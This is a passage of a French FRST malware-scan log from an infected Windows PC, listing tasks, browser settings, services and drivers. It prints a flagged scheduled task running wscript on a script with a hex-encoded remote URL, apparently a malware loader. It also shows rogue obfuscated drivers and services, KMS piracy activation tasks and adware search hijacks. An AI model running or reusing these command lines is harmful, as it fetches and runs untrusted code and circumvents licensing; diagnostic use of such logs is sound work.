Task: {7852DA1A-4BC5-4F84-9566-425C4725D74B} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_171_Plugin.exe [1456696 2019-04-10] (Adobe Inc. -> Adobe)
Task: {79A0F6D9-6F2F-44AC-A3C3-71CB3ED6C16D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {7FAB7B5B-97EB-4840-9AB8-FBBA1F4B9A8A} - System32\Tasks\Chameleon Folder-lenor => "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
Task: {8A94BE45-4D74-49EE-851C-514F6A4313C2} - System32\Tasks\wKernelCrash => wKernelCrash
Task: {9197AA68-498E-4351-A857-8B32BC1797FF} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {9CFA6BA7-A5F1-4B41-8882-37560E2D7A8E} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-04-04] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9F639095-A78E-45E0-812E-94DCBD03EBBD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [16509040 2019-04-04] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {A8ABC819-BE5F-4B07-A3FB-5E05200EA9E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {AC63497B-4A91-4266-94DE-5604EB402564} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {C3B3541F-DD10-4D4F-A689-84A47EC8145F} - System32\Tasks\***@*** => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2675176 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {CCD012B8-F79D-48C7-8CD9-8F9CF78D5944} - System32\Tasks\S-1-5-21-1452226929-484460335-584983045-1001\DataSenseLiveTileTask => C:\WINDOWS\System32\DataUsageLiveTileTask.exe [134144 2019-03-12] (Microsoft Windows -> Microsoft Corporation)
Task: {CD8413B8-0B7A-4B6F-A247-5C6BFA9D56B6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {D548B3B3-AEB4-4865-B0A6-5A97318C751E} - System32\Tasks\R@1n-KMS\Office16ProPlus => wmic path SoftwareLicensingProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate
Task: {E57A9365-CA32-4756-8DE0-855AB6917666} - System32\Tasks\Yahoo! Powered rocim => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{6225A746-E867-2D80-6EA1-B3C2F4E3380C}\dosa.txt" "68747470733a2f2f643277763764656e63316a78397a2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION
Task: {E6D6DB92-154A-4956-875B-635FB488AE33} - System32\Tasks\R@1n-KMS\Windows100Professional => wmic path SoftwareLicensingProduct where (ID="2de67392-b7a7-462a-b1ca-108dd189f588") call Activate
Task: {E974CB64-0BE0-4603-913E-234F86990054} - System32\Tasks\{1E3119E5-1603-4913-A777-A1C5DF1CA0CE} => "c:\program files\mozilla firefox\firefox.exe" hxxps://ui.skype.com/ui/0/7.40.0.103/fr/go/help.faq.installer?LastError=1618
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\WINDOWS\Tasks\wKernelCrash.job => C:\Users\lenor\AppData\Roaming\Microsoft\Windows\DESKTOP-JTGIDI3\lenorNWindows Foundation Services, Ban will cause system crash, please keep bootingጃ0
Task: C:\WINDOWS\Tasks\Yahoo! Powered rocim.job => C:\WINDOWS\system32\wscript.ex C:\ProgramData\{6225A746-E867-2D80-6EA1-B3C2F4E3380C}\dosa.txt <==== ATTENTION
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1f237367-5650-472f-8f9d-d2cec574e3a2}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-21-1452226929-484460335-584983045-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKU\S-1-5-21-1452226929-484460335-584983045-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COSP&ptag=D012219-N0690A3904163984&form=CONMHP&conlogo=CT3335855
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> DefaultScope {6855D245-F7E4-4699-8BE8-BDA8970FE987} URL = hxxp://search.hmyinstantsocial.com/s?uc=20190319&i_id=social_spt__1.30&source=12134_v1-bb9-iei&ap=appfocus340&uid=97cde529-de37-4c0a-98c5-50e879ee8c10&query={searchTerms}
SearchScopes: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> {6855D245-F7E4-4699-8BE8-BDA8970FE987} URL = hxxp://search.hmyinstantsocial.com/s?uc=20190319&i_id=social_spt__1.30&source=12134_v1-bb9-iei&ap=appfocus340&uid=97cde529-de37-4c0a-98c5-50e879ee8c10&query={searchTerms}
SearchScopes: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2019-04-16] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2019-04-17] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1452226929-484460335-584983045-1001 -> Pas de nom - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Pas de fichier
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-03-12] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 2dq5o2ru.default-1552240511929
FF ProfilePath: C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929 [2019-05-10]
FF Homepage: Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929 -> hxxps://www.bing.com/
FF Extension: (hotfix-update-xpi-intermediate) - C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929\Extensions\***@*** [2019-05-09]
FF Extension: (Avast Online Security) - C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929\Extensions\***@*** [2019-05-09]
FF Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\lenor\AppData\Roaming\Mozilla\Firefox\Profiles\2dq5o2ru.default-1552240511929\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-21]
FF HKLM\...\Firefox\Extensions: [***@***] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2017-11-01]
FF HKLM-x32\...\Firefox\Extensions: [***@***] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_171.dll [2019-04-10] (Adobe Inc. -> )
FF Plugin: @garmin.com/GpsControl -> C:\Program Files\Garmin GPS Plugin\npGarmin.dll [2014-03-31] (Garmin International, Inc. -> GARMIN Corp.)
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-01-22] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-07-29] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_171.dll [2019-04-10] (Adobe Inc. -> )
FF Plugin-x32: @garmin.com/GpsControl -> C:\Program Files (x86)\Garmin GPS Plugin\npGarmin.dll [2014-03-31] (Garmin International, Inc. -> GARMIN Corp.)
FF Plugin-x32: @itstructures.com/ffactivex -> J:\IPCOcx\npffax.dll [Pas de fichier]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2018-10-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2019-03-25] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-07-29] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-1452226929-484460335-584983045-1001: SkypePlugin -> C:\Users\lenor\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi.dll [2017-04-18] (Microsoft Corporation -> Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1452226929-484460335-584983045-1001: SkypePlugin64 -> C:\Users\lenor\AppData\Local\SkypePlugin\7.32.6.278\npGatewayNpapi-x64.dll [2017-04-18] (Microsoft Corporation -> Skype Technologies S.A.)
FF Plugin HKU\S-1-5-21-1452226929-484460335-584983045-1001: www.wansview.com/HYPlayer -> C:\Program Files (x86)\HYPlayer\npHYPlayer.dll [2016-09-22] (IPC) [Fichier non signé]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.fr/
CHR StartupUrls: Default -> "hxxp://www.google.fr/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/","hxxps://www.google.com/"
CHR NewTab: Default -> "active": true,
"entry": "chrome-extension://pilplloabdedfmialnfchjomjmpjcoej/index.html"
,
"active": false,
"entry": "chrome-extension://ilnidodcffjfecahcfiihlhiohnaobic/index.html"
CHR DefaultSearchURL: Default -> hxxp://www.bing.com/search?FORM=__PARAM__DF&PC=__PARAM__&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxp://www.bing.com/osjson.aspx?FORM=__PARAM__DF&PC=__PARAM__&query={searchTerms}
CHR Profile: C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default [2019-04-22]
CHR Extension: (Slides) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-21]
CHR Extension: (Docs) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-21]
CHR Extension: (Google Drive) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-21]
CHR Extension: (YouTube) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-21]
CHR Extension: (Bing) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmkckgpgekmanipelfidlhmkfcjicion [2019-03-23]
CHR Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2019-04-20]
CHR Extension: (Adobe Acrobat) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-04-02]
CHR Extension: (Sheets) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-21]
CHR Extension: (Google Docs hors connexion) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-21]
CHR Extension: (Lookup Pro) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghdonojphkbfhdccpohfhckojkpfanlg [2019-03-19]
CHR Extension: (AdBlock) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2019-04-13]
CHR Extension: (Avast Online Security) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2019-03-19]
CHR Extension: (chrome_filter) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\hfnonpaclhjinjjdaacgdackchjkaakk [2019-03-19]
CHR Extension: (Secured Search) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\ilnidodcffjfecahcfiihlhiohnaobic [2019-03-23]
CHR Extension: (Google Maps) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2019-02-21]
CHR Extension: (Allo-pages - Offres shopping) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgobcidghicodcnblfodnkjiplegjaho [2019-02-21]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-21]
CHR Extension: (Search Manager) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pilplloabdedfmialnfchjomjmpjcoej [2019-04-11]
CHR Extension: (Gmail) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-21]
CHR Extension: (Chrome Media Router) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-21]
CHR Extension: (System Table) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0 [2019-03-19]
CHR Profile: C:\Users\lenor\AppData\Local\Google\Chrome\User Data\System Profile [2019-04-22]
CHR Extension: (chrome_filter) - C:\Users\lenor\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\hfnonpaclhjinjjdaacgdackchjkaakk [2019-03-19]
CHR HKLM\...\Chrome\Extension: [ilnidodcffjfecahcfiihlhiohnaobic] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bmkckgpgekmanipelfidlhmkfcjicion] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ilnidodcffjfecahcfiihlhiohnaobic] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1452226929-484460335-584983045-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2017-11-01]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ilnidodcffjfecahcfiihlhiohnaobic] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2917864 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2709480 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [560544 2017-10-13] (Advanced Micro Devices, Inc. -> AMD)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2018-08-23] (Apple Inc. -> Apple Inc.)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [3644008 2018-12-17] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [526376 2017-09-21] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S2 KMS-R@1n; C:\Windows\***@*** [26112 2019-02-21] () [Fichier non signé]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 LMIRescue_def44806-347d-3fb3-3647-c355e9c73281; C:\Program Files (x86)\LogMeIn Rescue Applet\LMIR102F3001.tmp\LMI_Rescue_srv.exe [3778520 2019-05-09] (LogMeIn, Inc. -> LogMeIn, Inc.)
S2 N2IxOTkwZDM3; C:\Program Files\N2IxOTkwZDM3\MWFlM2.exe [1850296 2019-04-20] (technologiejarbon.com -> ) <==== ATTENTION
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390672 2012-08-08] (CyberLink -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5382448 2019-05-09] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2018-03-01] (TeamViewer GmbH -> TeamViewer GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [41952 2016-10-27] (VIA Technologies, Inc -> VIA Technologies, Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\NisSrv.exe [3851264 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MsMpEng.exe [118144 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
===================== Pilotes (Avec liste blanche) ======================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0318486.inf_amd64_11ba0b4b7cc81d52\atikmdag.sys [38774688 2017-10-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0318486.inf_amd64_11ba0b4b7cc81d52\atikmpag.sys [549792 2017-10-13] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-04-26] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2017-09-16] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2017-09-16] (Disc Soft Ltd -> Disc Soft Ltd)
R3 Hamachi; C:\WINDOWS\System32\drivers\Hamdrv.sys [45680 2017-06-29] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R3 MTsensor; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [17280 2013-05-17] (ASUSTeK Computer Inc. -> )
R1 NGZiZDgzY; C:\Windows\system32\drivers\NGZiZDgzY [78208 2019-04-20] (technologiejarbon.com -> ) <==== ATTENTION
R1 NTgzYTk2Yj; C:\WINDOWS\system32\drivers\NTgzYTk2Yj [124576 2019-01-22] (chavanactechnology.com -> )
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [1009128 2017-08-21] (Realtek Semiconductor Corp. -> Realtek )
R3 SNP2STD; C:\WINDOWS\system32\DRIVERS\snp2sxp.sys [12342656 2007-04-09] (Microsoft Windows Hardware Compatibility Publisher -> )
R3 SNP2STD; C:\Windows\SysWOW64\DRIVERS\snp2sxp.sys [12039552 2007-04-09] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2017-10-10] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 VBoxDrv; C:\WINDOWS\system32\drivers\VBoxDrv.sys [68288 2019-01-22] (innotek GmbH -> )
R3 VIAHdAudAddService; C:\WINDOWS\system32\drivers\viahduaa.sys [709856 2016-10-27] (VIA Technologies Inc. -> VIA Technologies, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [46472 2019-04-23] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [344544 2019-04-23] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60896 2019-04-23] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Avec liste blanche) ===================
